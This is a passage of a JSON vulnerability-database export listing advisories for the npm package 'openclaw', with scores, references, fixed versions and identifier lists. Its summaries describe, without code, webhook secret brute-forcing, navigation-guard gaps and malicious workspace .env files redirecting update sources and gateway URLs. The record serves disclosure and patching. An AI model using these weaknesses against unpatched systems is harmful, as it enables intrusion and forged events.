                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-536q-mj95-h29h",
                    "reference_id": "GHSA-536q-mj95-h29h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-536q-mj95-h29h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43580",
                "GHSA-536q-mj95-h29h"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pae5-uyu7-k3c1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91337?format=api",
            "vulnerability_id": "VCID-pc9z-x5wk-8ue7",
            "summary": "OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n## Summary\n\nNextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak.\n\n## Impact\n\nAn attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events.\n\n## Affected Component\n\n`extensions/nextcloud-talk/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33580",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19981",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00082",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24086",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00082",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24069",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33580"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9528-x887-j2fp",
                    "reference_id": "GHSA-9528-x887-j2fp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9528-x887-j2fp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-33580",
                "GHSA-9528-x887-j2fp"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pc9z-x5wk-8ue7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89369?format=api",
            "vulnerability_id": "VCID-pdmd-a4fg-8fcg",
            "summary": "OpenClaw: Workspace .env could inject OpenClaw runtime-control variables\n## Summary\n\nWorkspace .env could inject OpenClaw runtime-control variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nA malicious workspace `.env` file could set OpenClaw runtime-control variables affecting update sources, gateway URLs, ClawHub resolution, browser executable paths, and related behavior.\n\n## Technical Details\n\nThe fix blocks OpenClaw runtime-control keys and key families from workspace `.env` loading.\n\n## Fix\n\nThe issue was fixed in #62660. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `dbfcef319618158fa40b31cdac386ea34c392c0c`\n- PR: #62660\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43531",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0832",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09649",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09673",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43531"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/62660",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/62660"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43531",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43531"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
